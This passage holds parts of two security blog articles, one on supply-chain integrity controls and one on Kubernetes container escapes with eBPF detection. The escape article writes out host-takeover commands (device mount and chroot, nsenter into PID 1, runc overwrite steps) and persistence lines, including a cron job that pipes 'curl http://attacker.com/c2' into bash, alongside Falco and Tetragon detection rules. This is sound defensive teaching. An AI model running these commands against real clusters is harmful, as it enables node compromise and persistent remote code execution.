echo "registry=https://your-artifactory.company.com/artifactory/api/npm/npm-virtual/" > .npmrc
echo "always-auth=true" >> .npmrc

3. Reproducible Builds — Same Input Produces Same Output

Reproducible builds allow independent verification: a third party can take the same source and build environment and produce a byte-for-byte identical artifact. If the published artifact does not match, something changed between source and distribution.

This is exactly how the XZ tarball compromise would have been caught earlier with proper tooling: the release tarball did not match what would be produced by checking out the git tag and running the build.

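# For Go: builds are reproducible when the toolchain version, module
# versions, and build flags match; -trimpath (Go 1.13+) removes local paths
# Verify by building twice and comparing (./cmd/your-app is a placeholder)
go build -trimpath -o binary-1 ./cmd/your-app
go build -trimpath -o binary-2 ./cmd/your-app
sha256sum binary-1 binary-2
# Identical hashes = reproducible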

# For containers with BuildKit: use --no-cache and compare digests
DOCKER_BUILDKIT=1 docker build --no-cache -t test-1 .
DOCKER_BUILDKIT=1 docker build --no-cache -t test-2 .
docker inspect test-1 test-2 | jq '.[].Id'
# Identical IDs = reproducible build environment

# SOURCE_DATE_EPOCH forces reproducible timestamps (common reproducibility blocker)
export SOURCE_DATE_EPOCH=$(git log -1 --format=%ct)
make  # or whatever your build command is
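
To see why timestamps and file ordering matter, here is a minimal sketch of a deterministic archive step using Python's tarfile module. It assumes the inputs are held in memory as a dict of path to bytes; the function names are hypothetical, and the archive is left uncompressed because gzip adds its own timestamp:

```python
import hashlib
import io
import tarfile


def deterministic_tar(files, source_date_epoch):
    """Build a tar archive whose bytes depend only on contents and the epoch."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tar:
        for name in sorted(files):  # fixed ordering
            data = files[name]
            info = tarfile.TarInfo(name=name)
            info.size = len(data)
            info.mtime = source_date_epoch  # fixed timestamp
            info.mode = 0o644
            info.uid = info.gid = 0  # no builder identity in the archive
            info.uname = info.gname = ""
            tar.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def archive_digest(files, source_date_epoch):
    """SHA-256 of the deterministic archive."""
    return hashlib.sha256(deterministic_tar(files, source_date_epoch)).hexdigest()
```

Two builders that pass the same files and the same SOURCE_DATE_EPOCH value get the same digest, which is what makes independent verification possible.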

4. Separate Build and Release Environments

SolarWinds built and signed in the same compromised environment. The build environment had signing keys. An attacker who owns the build host owns the signing operation.

INSECURE:                           SECURE:

Build host ──▶ compile              Build host ──▶ compile
           ──▶ sign artifact                   ──▶ output unsigned artifact
           ──▶ publish                                    │
                                                          ▼
                                    Separate signing host (air-gapped or HSM)
                                                    ──▶ verify artifact hash
                                                    ──▶ sign with HSM key
                                                    ──▶ publish signed artifact

In practice: signing keys should live in a hardware security module (HSM) or KMS, not on the build host. The build produces an artifact hash; the signing service receives only the hash, not the full artifact, and signs it with the HSM-protected key. Build host compromise does not yield the signing key.
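
The hash-only handoff can be sketched in a few lines. This is an illustration of the data flow, not a signing implementation: HMAC from the standard library stands in for the HSM or KMS signature, and the class and function names are hypothetical:

```python
import hashlib
import hmac

HEX_DIGITS = set("0123456789abcdef")


class SigningService:
    """Stand-in for an HSM/KMS-backed signer. The key never leaves this object."""

    def __init__(self, key):
        self._key = key

    def sign_digest(self, digest_hex):
        # The service accepts only a SHA-256 digest, never the artifact itself.
        if len(digest_hex) != 64 or not set(digest_hex) <= HEX_DIGITS:
            raise ValueError("expected a lowercase SHA-256 hex digest")
        return hmac.new(self._key, bytes.fromhex(digest_hex), hashlib.sha256).hexdigest()

    def verify(self, artifact, signature_hex):
        digest = hashlib.sha256(artifact).hexdigest()
        return hmac.compare_digest(self.sign_digest(digest), signature_hex)


def build(source):
    """Placeholder build step: returns the artifact and its digest."""
    artifact = b"compiled:" + source
    return artifact, hashlib.sha256(artifact).hexdigest()
```

The build host calls build and sends only the digest across the boundary. A compromised build host can still request a signature for a poisoned artifact, which is why the signing side should also check provenance before signing.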

5. SBOM in Every Release — Non-Negotiable

If you cannot enumerate what is in your artifact, you cannot answer supply chain compromise questions. When CVE-2024-3094 dropped, every organization with an SBOM could query it in minutes. Organizations without one had to manually inspect every container image and every deployed system.

# Attach SBOM to a container image as an attestation (stored in registry)
syft ghcr.io/your-org/your-image:latest -o cyclonedx-json | \
  cosign attest \
    --predicate /dev/stdin \
    --type cyclonedx \
    ghcr.io/your-org/your-image:latest
# The SBOM is now stored alongside the image and signed with OIDC credentials

# Later: retrieve and search the SBOM
cosign verify-attestation \
  --type cyclonedx \
  --certificate-identity-regexp="^https://github.com/your-org/your-repo/" \
  --certificate-oidc-issuer="https://token.actions.githubusercontent.com" \
  ghcr.io/your-org/your-image:latest | \
  jq -r '.payload | @base64d | fromjson | .predicate.components[] | 
    select(.name == "xz-libs") | {name, version}'

⚠ Production Gotchas

Hash pinning breaks automated dependency update workflows. When you pin with hashes, tools like Dependabot and Renovate still open PRs, but they must also update the hashes. This works — both tools support hash pinning — but you must configure them explicitly. Without hash update support in your automation, developers will remove pinning to unblock themselves.

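SLSA Level 3 plus hermetic builds is a pipeline restructuring project, and most teams are not ready. SLSA v1.0 Level 3 requires a hardened build platform with isolated builds and signing keys that build steps cannot reach; hermeticity is a separate property that v1.0 does not mandate but that closes the build-time injection gap. Hermetic means the build process makes no network calls during compilation (all dependencies fetched in a prior, logged step). Most existing CI pipelines fetch dependencies during the build step, so getting there requires restructuring your pipeline into explicit fetch → build phases. Start at Level 2 (hosted, signed provenance) and treat Level 3 with hermetic builds as a 6-month target.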

SBOMs without a query workflow are paperwork. Generating an SBOM with syft and storing it somewhere is the easy part. The useful part is having a process to query all SBOMs across your fleet within minutes of a new CVE. Without that query infrastructure, you have documentation, not detection capability.

A missing signature must be a policy denial, not a webhook error. If an image has no cosign signature, cosign verify returns an error, which is correct. But in a Kubernetes admission webhook that enforces signing (e.g., Kyverno, OPA/Gatekeeper), an unsigned image must be an explicit policy violation, not a webhook error that gets bypassed by a fail-open configuration. Always run admission webhooks in fail-closed mode.

Tarball vs git diff requires automation. Manually diffing every release tarball against its git tag is not sustainable. The XZ compromise would have been caught earlier if distributions had automated this check as part of their packaging workflow. Tools like diffoscope can automate the comparison; integrating it into your package intake process is the structural fix.

Quick Reference

Attack Vector	Detection Signal	Fix
Build system compromise (SolarWinds)	Artifact hash drift; unexpected egress during build; tarball ≠ git diff	SLSA Level 3 build platform with hermetic build steps; separate signing environment
Maintainer social engineering (XZ)	Tarball ≠ git diff; SBOM shows unexpected dependency; anomalous sshd syscalls	Reproducible builds; tarball verification in package intake
Dependency confusion	Package resolves from public registry instead of private	Private artifact registry with scoped package names
Typosquatting	Package name in a lockfile or SBOM diff that nobody requested; `pip-audit` findings once the package is reported	Private registry; automated dependency scanning in CI
Unsigned container image	`cosign verify` fails; no attestation in registry	Sigstore/cosign in CI; fail-closed admission webhook

Key Takeaways

Supply chain attacks bypass perimeter security entirely — the attacker delivers malware through a channel you already trust, signed by a certificate you already trust, via an update mechanism you already approve
SolarWinds was caught by a downstream victim (FireEye), not by SolarWinds’ own security team — the build environment had no integrity monitoring that could detect modification of compiled artifacts
XZ Utils was caught by an engineer noticing a 500ms latency anomaly during unrelated performance work, not by any security tooling. The backdoored versions had already reached rolling and pre-release distributions and were weeks away from shipping in stable Linux distribution releases
The detection pipeline has five layers, each catching a different attack class: hash pinning (dependency hijacking), SBOM (enumeration and CVE correlation), Sigstore signing (artifact integrity), SLSA provenance (build traceability), tarball vs git diff (source/distribution divergence)
Start with what you can implement this week: pip-audit or npm audit signatures in CI, syft SBOM generation on every image build, and cosign signing for any container image that reaches production — these three steps cover the most common attack classes with minimal pipeline restructuring

What’s Next

SolarWinds showed that attackers can own your build system and reach your customers’ production networks through a single trusted update. Once they have a foothold in a cloud account — whether via a compromised build artifact or any other initial access vector — the next move is lateral: cross-account IAM role chaining to escalate from a single compromised resource to your entire cloud organization. EP10 covers what that lateral movement looks like, how to detect trust relationship abuse in CloudTrail, and how to structure cross-account access so that a single compromise cannot pivot to every account you own.


Kubernetes Container Escape: Attack Paths and eBPF Detection

June 26, 2026 by Vamshi Krishna Santhapuri

Reading Time: 17 minutes

TL;DR

Kubernetes container escape is OWASP A04 + A05: a container deployed with --privileged, hostPID, or hostNetwork is not meaningfully isolated from the host — two commands can produce a root shell on the node
The kernel does not enforce Kubernetes namespace semantics. Container isolation comes from Linux namespaces, cgroups, and seccomp. --privileged removes those boundaries — the kernel sees no difference between the container and the host
Three primary escape paths: privileged container with host device access, hostPID + nsenter, and runc CVEs (CVE-2019-5736) that allow a malicious container to overwrite the runc binary during exec
Detection requires kernel-level visibility: Falco fires on privileged container exec; Tetragon traces nsenter and mount syscalls at the point of the kernel hook, not a process name check that can be evaded
The structural fix is PodSecurity admission enforcing the Restricted profile at the namespace level: policy that blocks --privileged, hostPID, hostNetwork, and hostPath mounts before a pod ever schedules
Network policy as a secondary layer: even if a container escapes to the node, a network policy that blocks the escaped process from reaching the Kubernetes API server limits lateral movement to the cluster control plane

OWASP Mapping: A04 Insecure Design — --privileged placed in production workloads because the development environment never enforced boundaries. A05 Security Misconfiguration — absence of PodSecurity admission, RuntimeClass, and seccomp profiles.

The Big Picture

┌─────────────────────────────────────────────────────────────────────────┐
│              KUBERNETES CONTAINER ESCAPE — ATTACK SURFACE               │
│                                                                         │
│  ┌──────────────────────────────────────────────────────────────┐       │
│  │                     KUBERNETES NODE                          │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (--privileged)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  web app ──▶ exploit ──▶ shell in container          │   │       │
│  │  │                           │                           │   │       │
│  │  │  PATH 1: mount /dev/sda1  │                           │   │       │
│  │  │  ──────────────────────── ▼                           │   │       │
│  │  │  chroot /mnt/host → root shell on node                │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (hostPID=true)                             │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 2: nsenter -t 1 -m -u -i -n -p -- bash         │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           root shell in host PID 1 namespaces         │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  ┌───────────────────────────────────────────────────────┐   │       │
│  │  │  Container (runc CVE)                                 │   │       │
│  │  │                                                       │   │       │
│  │  │  PATH 3: overwrite /proc/self/exe during runc exec    │   │       │
│  │  │  ─────────────────────────────────────────────────▶   │   │       │
│  │  │           arbitrary code execution as root on node    │   │       │
│  │  └───────────────────────────────────────────────────────┘   │       │
│  │                                                              │       │
│  │  Node root → kubectl access → cluster-admin via node creds  │       │
│  └──────────────────────────────────────────────────────────────┘       │
│                                                                         │
│  DETECTION LAYER        │  STRUCTURAL FIX                               │
│  Falco / Tetragon       │  PodSecurity Restricted                       │
│  mount syscall hooks    │  RuntimeClass (gVisor/Kata)                   │
│  audit logs             │  Seccomp + no-new-privileges                  │
└─────────────────────────────────────────────────────────────────────────┘

Kubernetes container escape is the point where a compromised application pod becomes a compromised Kubernetes node — and from a node, an attacker reaches the kubelet credential, the node’s service account, and often a path to cluster-admin. The boundary between container and host is not the Kubernetes API. It is Linux namespaces, cgroups, and seccomp. When you remove those with --privileged, you remove the boundary.

The Incident: --privileged “Just for Debugging”

A networking issue in staging. The developer can’t get the CNI tracing they need from inside the normal container. Someone adds privileged: true to the container’s securityContext (the pod-spec equivalent of docker run --privileged) to expose /sys/class/net and the raw packet socket. The PR merges. The staging deployment works. The privileged setting stays in the manifest when staging gets promoted to production.

Six months later, the web application running in that pod has an RCE vulnerability. The attacker gets a shell.

Inside the container, three commands:

mkdir /mnt/host
mount /dev/sda1 /mnt/host
chroot /mnt/host /bin/bash

Root on the node. Not escalation through a kernel exploit. Not a zero-day. Just mounting the device that was always accessible because --privileged was set.

The node has a kubelet credential and a service account token with broader permissions than the compromised application ever needed. From the node, lateral movement into the cluster control plane is a matter of using credentials that are already there.

This is A04 (Insecure Design) and A05 (Security Misconfiguration) combined: the design didn’t account for what happens when the boundary is removed, and no enforcement mechanism prevented the configuration from reaching production.
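
A missing enforcement mechanism is cheap to add at review time. A minimal sketch of a manifest lint, assuming the pod spec has already been parsed from YAML into a dict; the function name is hypothetical, and this complements rather than replaces PodSecurity admission in the cluster:

```python
def escape_risks(pod_spec):
    """List pod-spec settings that weaken or remove container isolation."""
    findings = []
    for flag in ("hostPID", "hostNetwork", "hostIPC"):
        if pod_spec.get(flag):
            findings.append(flag)
    for volume in pod_spec.get("volumes", []):
        if "hostPath" in volume:
            findings.append("hostPath volume: %s" % volume.get("name"))
    containers = pod_spec.get("containers", []) + pod_spec.get("initContainers", [])
    for container in containers:
        security_context = container.get("securityContext") or {}
        if security_context.get("privileged"):
            findings.append("privileged container: %s" % container.get("name"))
    return findings
```

Run against the manifest from this incident, the lint would have reported the privileged container on the pull request that added it, six months before the RCE mattered.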

Why the Kernel Doesn’t Know About Kubernetes

Kubernetes namespaces are a scheduler and API concept. When you create a Kubernetes namespace and apply RBAC to it, you are controlling what the Kubernetes API server will accept — you are not creating a kernel isolation boundary between workloads in different namespaces.

Kernel isolation comes from:

Linux namespaces (PID, net, mount, IPC, UTS, user)
  ├── Created by container runtime (containerd, crio)
  ├── Container processes run inside these namespaces
  └── From inside: host PIDs, host network, host filesystem are not visible

cgroups
  ├── Limit CPU, memory, and device access per container
  └── Prevent runaway resource consumption and limit device access scope

seccomp profiles
  ├── Filter system calls the container is allowed to invoke
  └── Block ptrace, mount, and other privileged syscalls

Capabilities
  ├── Fine-grained kernel privileges (CAP_NET_ADMIN, CAP_SYS_ADMIN, etc.)
  └── --privileged grants ALL capabilities + disables seccomp + disables AppArmor

--privileged weakens three of these four layers simultaneously. It grants every capability, disables the default seccomp filter, disables AppArmor confinement, and lifts the device cgroup allowlist so host block devices are reachable. The namespaces remain, so a privileged container is effectively a process running on the host with a different filesystem view, and with mount, you can fix even the filesystem view.

Red Phase: The Three Escape Paths

Path 1: --privileged Container

A privileged container has CAP_SYS_ADMIN, which includes the ability to mount arbitrary block devices. On a node with a standard Linux filesystem, /dev/sda1 or equivalent contains the host root filesystem.

Check if the current container is privileged:

# CapEff shows the effective capability set as a hex bitmask
cat /proc/1/status | grep CapEff
# CapEff: 0000003fffffffff

# Decode it
capsh --decode=0000003fffffffff | grep -o 'cap_sys_admin'
# cap_sys_admin — present means privileged
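
The CapEff bitmask can be decoded without capsh, which is often missing from minimal images. A minimal sketch: the bit positions come from the Linux capability numbering (CAP_SYS_ADMIN is bit 21), while the selection of capabilities to report is an illustrative assumption:

```python
# Bit positions from the Linux capability numbering; the selection is illustrative.
CAPS = {
    "CAP_NET_ADMIN": 12,
    "CAP_SYS_MODULE": 16,
    "CAP_SYS_PTRACE": 19,
    "CAP_SYS_ADMIN": 21,
}


def read_cap_eff(status_text):
    """Extract the CapEff hex string from /proc/<pid>/status contents."""
    for line in status_text.splitlines():
        if line.startswith("CapEff:"):
            return line.split()[1]
    return None


def dangerous_caps(cap_eff_hex):
    """Return the escape-relevant capabilities set in a CapEff bitmask."""
    mask = int(cap_eff_hex, 16)
    return [name for name, bit in CAPS.items() if mask & (1 << bit)]
```

Feeding it the contents of /proc/1/status from inside the container gives the same answer as the capsh check. The default Docker capability mask 00000000a80425fb returns an empty list, while the privileged mask above returns all four.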

Full escape sequence:

# Step 1: Identify the host block device
# /proc/mounts shows what the container runtime mounted
cat /proc/mounts | grep ' / '
# overlay on / type overlay (rw,...,upperdir=/var/lib/containerd/...)

# Or: check fdisk/lsblk — visible in privileged container
lsblk
# NAME   MAJ:MIN RM  SIZE RO TYPE MOUNTPOINTS
# sda      8:0    0   80G  0 disk
# ├─sda1   8:1    0   79G  0 part /
# └─sda2   8:2    0    1G  0 part [SWAP]

# Step 2: Mount host root filesystem
mkdir -p /mnt/host
mount /dev/sda1 /mnt/host

# Step 3a: Write attacker SSH key to host authorized_keys
echo "ssh-rsa AAAA..." >> /mnt/host/root/.ssh/authorized_keys

# Step 3b: Or take an immediate root shell via chroot
chroot /mnt/host /bin/bash
# Now running as root in the host filesystem
# id: uid=0(root) gid=0(root)

# Step 4: From host root — access kubelet credentials
cat /etc/kubernetes/pki/ca.crt
# Or pull the node's bootstrap token / client cert for API server access
ls /var/lib/kubelet/pki/

What persistence looks like from node root:

# Add a backdoor user to host /etc/passwd
chroot /mnt/host useradd -m -s /bin/bash -G sudo backdoor
chroot /mnt/host passwd backdoor

# Or: schedule a cron job on the host
echo "* * * * * root curl http://attacker.com/c2 | bash" \
  >> /mnt/host/etc/cron.d/maintenance

Path 2: hostPID / hostNetwork Escape

hostPID: true is a less obvious escape path than --privileged but equally dangerous. When a container shares the host PID namespace, it can see and interact with every process running on the node — including PID 1, which is running in the host’s full namespace set.

With hostPID enabled and CAP_SYS_ADMIN available (setns requires it, and privileged containers have it), nsenter produces a host root shell without mounting anything:

# From inside the container — see all host processes
ps aux
# This will show containerd, kubelet, systemd, sshd — everything on the node

# nsenter: enter the namespaces of PID 1 (host init process)
# -t 1: target PID 1
# -m: enter mount namespace (host filesystem)
# -u: enter UTS namespace (host hostname)
# -i: enter IPC namespace
# -n: enter network namespace
# -p: enter PID namespace
nsenter -t 1 -m -u -i -n -p -- bash

# Now running in host namespaces
hostname   # shows node hostname, not container hostname
mount | grep " / "  # shows host root mount, not container overlay
id         # uid=0(root) gid=0(root)

nsenter — a Linux utility that enters the namespaces of an existing process. With -t 1 it enters PID 1’s namespaces, which are the host’s namespaces. The result is a shell that sees the host filesystem, host network, and host process tree as if running directly on the node.

hostNetwork: true on its own does not directly produce a root shell, but it exposes the node’s network interfaces and allows binding to host ports. Combined with access to the cloud provider’s instance metadata service (IMDS), it enables credential theft from the node’s IAM role — the attack path covered in SSRF to cloud metadata and IMDSv1 exploitation.

Path 3: runc CVE Escape (CVE-2019-5736)

CVE-2019-5736 is a different attack class: it does not require a misconfiguration in the pod spec. It exploits the way the runc container runtime itself handles /proc/self/exe when it executes a process inside a container.

The mechanism:

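1. Attacker controls a container image, or can write files inside a running container
2. Attacker replaces a binary in the container (for example /bin/bash) so that it points at /proc/self/exe (a symlink, or a script starting with #!/proc/self/exe)
3. Operator runs: kubectl exec -it <pod> -- /bin/bash
4. runc enters the container and executes that target, which resolves to /proc/self/exe: the host's own runc binary
5. Attacker's code in the container opens /proc/<runc-pid>/exe and obtains a file descriptor that refers to the runc binary on the host
6. Once the runc process exits, attacker reopens that descriptor for writing and overwrites the host runc binary with a malicious binary
7. On next runc exec, malicious binary runs as root on the host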

The detection signature for runc-class escapes is writes to /proc/self/exe or writes to paths that correspond to runc’s host binary location from within a container process:

# Simplified bpftrace observation of write() calls (read-only: it does not modify the system).
# As written it prints every write(); resolving the fd to /proc/self/exe is what Tetragon implements as a continuous policy

bpftrace -e '
tracepoint:syscalls:sys_enter_write {
  // Track write() calls where the fd points to /proc/self/exe
  // In production: Tetragon handles this at the LSM hook level
  printf("PID %d comm %s writing fd %d\n", pid, comm, args->fd);
}
' 2>/dev/null | head -20

Patched versions of runc (1.0.0-rc7+, containerd 1.2.3+) fix the vulnerability. The practical implication: node patching is the fix for runc-class CVEs, because pod security policy cannot prevent a vulnerability in the container runtime itself.

Safe Simulation: Audit Your Cluster Before an Attacker Does

These commands are read-only and safe to run against any cluster you have kubectl access to:

# Find all pods running with --privileged
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name, 
     (.spec.containers[] | select(.securityContext.privileged == true) | .name)] |
    join(" / ")' | \
  sort -u

# Find pods with hostPID or hostNetwork
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.hostPID == true or .spec.hostNetwork == true) |
    [.metadata.namespace, .metadata.name,
     ([(if .spec.hostPID then "hostPID" else empty end),
       (if .spec.hostNetwork then "hostNetwork" else empty end)] | join("+"))] |
    join(" / ")' | \
  sort -u

# Check for pods using hostPath mounts (host filesystem access via volume)
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(.spec.volumes[]?.hostPath != null) |
    [.metadata.namespace, .metadata.name,
     (.spec.volumes[] | select(.hostPath != null) |
      .name + "→" + .hostPath.path)] |
    join(" / ")' | \
  sort -u

# Check DaemonSets — these often run privileged and cover every node
kubectl get daemonsets -A -o json | \
  jq -r '.items[] |
    select(.spec.template.spec.containers[].securityContext.privileged == true) |
    [.metadata.namespace, .metadata.name] | join("/")' | \
  sort -u
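
The same audit can be sketched in Python for cases where the output of kubectl get pods -A -o json has been saved to a file and jq is not available. This is a minimal sketch, not a replacement for the commands above: the function name find_escape_risks and the finding labels are illustrative assumptions, and it additionally looks at initContainers and hostIPC.

```python
def find_escape_risks(pod_list):
    """Return sorted (namespace, pod, finding) tuples for escape-relevant settings.

    pod_list is the parsed JSON from `kubectl get pods -A -o json`.
    """
    findings = set()
    for pod in pod_list.get("items", []):
        meta = pod.get("metadata") or {}
        spec = pod.get("spec") or {}
        ns, name = meta.get("namespace", ""), meta.get("name", "")

        # Host namespace sharing (Path 2)
        for flag in ("hostPID", "hostNetwork", "hostIPC"):
            if spec.get(flag) is True:
                findings.add((ns, name, flag))

        # Privileged containers (Path 1); init containers count too
        containers = (spec.get("containers") or []) + (spec.get("initContainers") or [])
        for c in containers:
            if (c.get("securityContext") or {}).get("privileged") is True:
                findings.add((ns, name, "privileged:" + str(c.get("name"))))

        # hostPath volumes expose the host filesystem without a mount() call
        for vol in spec.get("volumes") or []:
            host_path = vol.get("hostPath")
            if host_path:
                findings.add((ns, name, "hostPath:" + str(host_path.get("path"))))
    return sorted(findings)


# Hypothetical sample input, shaped like the kubectl JSON output
sample = {"items": [{
    "metadata": {"namespace": "demo", "name": "debug-pod"},
    "spec": {
        "hostPID": True,
        "containers": [{"name": "shell", "securityContext": {"privileged": True}}],
        "volumes": [{"name": "host-etc", "hostPath": {"path": "/etc"}}],
    },
}]}
for ns, name, finding in find_escape_risks(sample):
    print(f"{ns} / {name} / {finding}")
```

To run it against a real cluster, load the saved file with json.load and pass the result to find_escape_risks.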

Blue Phase: eBPF Detection

Detecting container escape attempts requires visibility below the Kubernetes API layer. Audit logs show pod creation — they do not show what a process inside the container does with mount, nsenter, or /proc/self/exe. eBPF-based tools (Falco, Tetragon) attach to kernel hooks and observe syscalls regardless of what namespace or container they originate from.

Falco: Privileged Container and Mount Detection

# Falco rules for container escape detection
# /etc/falco/rules.d/container-escape.yaml

# Rule 1: Privileged container started
- rule: Privileged Container Started
  desc: >
    A container running with --privileged was started.
    This removes all capability and seccomp restrictions.
  condition: >
    container.privileged = true and
    evt.type = execve and
    container.id != host
  output: >
    Privileged container started
    (user=%user.name user_uid=%user.uid
     command=%proc.cmdline
     container_id=%container.id
     container_name=%container.name
     image=%container.image.repository:%container.image.tag
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, privilege-escalation, OWASP-A05]

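# List referenced by Rule 2 (example values; adjust to the runtimes on your nodes)
- list: container_runtime_processes
  items: [runc, containerd, containerd-shim, dockerd, crio]

# Rule 2: Mount syscall from inside a container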
- rule: Container Mount Syscall
  desc: >
    A process inside a container invoked mount().
    In a non-privileged container this fails; in a privileged container
    it succeeds and may be mounting host block devices.
  condition: >
    evt.type = mount and
    container.id != host and
    not proc.name in (container_runtime_processes)
  output: >
    Mount syscall from container
    (user=%user.name
     command=%proc.cmdline
     mount_source=%evt.arg.source
     mount_target=%evt.arg.target
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, OWASP-A04]

# Rule 3: nsenter or chroot invoked inside container
- rule: Namespace Enter or Chroot in Container
  desc: >
    nsenter or chroot executed from within a running container.
    nsenter with -t 1 enters host namespaces directly.
  condition: >
    evt.type = execve and
    container.id != host and
    proc.name in (nsenter, chroot)
  output: >
    nsenter/chroot executed in container
    (user=%user.name
     command=%proc.cmdline
     parent=%proc.pname
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: ERROR
  tags: [container, privilege-escalation, T1611]

# Rule 4: Process reading host PID tree (hostPID indicator)
- rule: Container Reading Host Process List
  desc: >
    A process inside a container is reading /proc entries for PIDs
    that don't belong to it — indicates hostPID=true and enumeration.
  condition: >
    evt.type = openat and
    fd.name startswith /proc/ and
    fd.name endswith /status and
    container.id != host and
    not fd.name startswith /proc/self
  output: >
    Container reading host process status
    (proc=%proc.cmdline fd=%fd.name
     container_id=%container.id
     namespace=%k8s.ns.name pod=%k8s.pod.name)
  priority: WARNING
  tags: [container, discovery, T1057]

Tetragon: TracingPolicy for nsenter and Mount Syscalls

Tetragon attaches eBPF programs at LSM (Linux Security Module) hooks and kernel function entry/exit points. Unlike Falco, which observes events and alerts after the fact, Tetragon can also enforce in the kernel: it can kill the offending process or override a call's return value before the operation completes.

# Tetragon TracingPolicy: detect and optionally block container escape attempts
apiVersion: cilium.io/v1alpha1
kind: TracingPolicy
metadata:
  name: container-escape-detection
  # TracingPolicy is cluster-scoped, so no namespace is set here
  # (TracingPolicyNamespaced is the namespaced variant)
spec:
  kprobes:
    # Hook 1: sys_mount — detect any mount() call from a container process
    - call: "sys_mount"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # source device (e.g. /dev/sda1)
        - index: 1
          type: "string"     # target mount point
        - index: 2
          type: "string"     # filesystem type
      selectors:
        # Only fire for container processes (not the container runtime itself)
        - matchNamespaces:
          - namespace: Pid
            operator: NotIn
            values:
              - "host_ns"       # Tetragon keyword that resolves to the host namespace
          matchActions:
          - action: Post        # Post = log; change to Sigkill to enforce

    # Hook 2: sys_execve for nsenter binary
    # (with syscall: true, Tetragon resolves the architecture-specific symbol name)
    - call: "sys_execve"
      return: false
      syscall: true
      args:
        - index: 0
          type: "string"     # filename being executed
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/nsenter"
          matchActions:
          - action: Post

    # Hook 3: write to /proc/self/exe (runc CVE class indicator)
    # Kept in the same kprobes list: a second kprobes key would be a duplicate YAML key
    - call: "vfs_write"
      return: false
      syscall: false
      args:
        - index: 0
          type: "file"
      selectors:
        - matchArgs:
          - index: 0
            operator: Postfix
            values:
              - "/proc/self/exe"
          matchActions:
          - action: Sigkill   # Block immediately — no legitimate use case for this write

bpftrace: Quick Node-Level Validation

Before deploying Tetragon, you can validate that mount syscalls are observable from the host using bpftrace directly on a node:

# Run on the Kubernetes node (requires root or CAP_BPF)
# Safe observation mode — shows mount attempts from any process including containers

bpftrace -e '
tracepoint:syscalls:sys_enter_mount {
  printf("%-8d %-20s %-30s -> %-30s type=%s\n",
    pid, comm,
    str(args->dev_name),   // source device
    str(args->dir_name),   // mount target
    str(args->type));      // filesystem type
}
' 2>/dev/null
# Sample output:
# PID      COMM                 SOURCE                         TARGET                         TYPE
# 38471    bash                 /dev/sda1                      /mnt/host                      ext4
# 38471 and comm=bash from inside a container = escape attempt in progress

# Watch for nsenter executions across all processes on the node
bpftrace -e '
tracepoint:syscalls:sys_enter_execve {
  if (str(args->filename) == "/usr/bin/nsenter" ||
      str(args->filename) == "/bin/nsenter") {
    printf("nsenter called: pid=%d ppid=%d comm=%s\n",
      pid, curtask->real_parent->pid, comm);
  }
}
' 2>/dev/null

What Kubernetes Audit Logs Show (and What They Miss)

Kubernetes audit logs record API server activity. They show pod creation with --privileged set — but only if you are watching pod spec creation events. They do not show anything that happens inside the container after it starts.

# Enable audit policy to capture pod creation with privileged spec
# /etc/kubernetes/audit-policy.yaml (excerpt)

apiVersion: audit.k8s.io/v1
kind: Policy
rules:
  # Log pod creation at RequestResponse level (captures full spec)
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods"]
    verbs: ["create", "update", "patch"]

  # Log exec into pods — this is the entry point for escape attempts
  - level: RequestResponse
    resources:
      - group: ""
        resources: ["pods/exec"]
    verbs: ["create"]

# Parse audit log for privileged pod creation
grep '"privileged":true' /var/log/kubernetes/audit.log | \
  jq -r '[
    .requestReceivedTimestamp,
    .user.username,
    .objectRef.namespace + "/" + .objectRef.name,
    "privileged=true"
  ] | join(" | ")'

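# Note: Kubernetes Events are not audit logs. "Created" events only say
# "Created container <name>" and carry no securityContext, so filtering them
# for "privileged" returns nothing. Without audit log access, query live pod specs:
kubectl get pods -A -o json | \
  jq -r '.items[] |
    select(any(.spec.containers[]; .securityContext.privileged == true)) |
    [.metadata.namespace, .metadata.name] |
    join(" / ")'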

The audit log gap is important to understand: audit logs are a first-alert layer for misconfigured pod creation, not a detection layer for in-progress escape. By the time you see a pods/exec event in audit logs, the attacker already has a shell. eBPF-based detection at the syscall level is what catches the escape itself.
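
As a first-alert layer, the audit log can be triaged with a short script. The sketch below assumes the log backend writes one JSON audit event per line and that pod writes are logged at RequestResponse level (so requestObject is present), as in the policy excerpt above. The function name triage_audit_events and the alert labels are illustrative, not part of any Kubernetes tooling.

```python
import json


def triage_audit_events(lines):
    """Return (timestamp, user, namespace/pod, reason) tuples worth a first look."""
    alerts = []
    for line in lines:
        line = line.strip()
        if not line:
            continue
        try:
            event = json.loads(line)
        except json.JSONDecodeError:
            continue  # skip truncated or non-JSON lines

        ref = event.get("objectRef") or {}
        if ref.get("resource") != "pods":
            continue

        request_obj = event.get("requestObject") or {}
        # On create, the pod name may only be present in the request body
        name = ref.get("name") or (request_obj.get("metadata") or {}).get("name", "")
        target = f"{ref.get('namespace', '')}/{name}"
        who = (event.get("user") or {}).get("username", "unknown")
        when = event.get("requestReceivedTimestamp", "")

        # kubectl exec shows up as a create on the pods/exec subresource
        if ref.get("subresource") == "exec":
            alerts.append((when, who, target, "exec"))
            continue

        spec = request_obj.get("spec") or {}
        containers = spec.get("containers") or []
        if any((c.get("securityContext") or {}).get("privileged") is True
               for c in containers):
            alerts.append((when, who, target, "privileged"))
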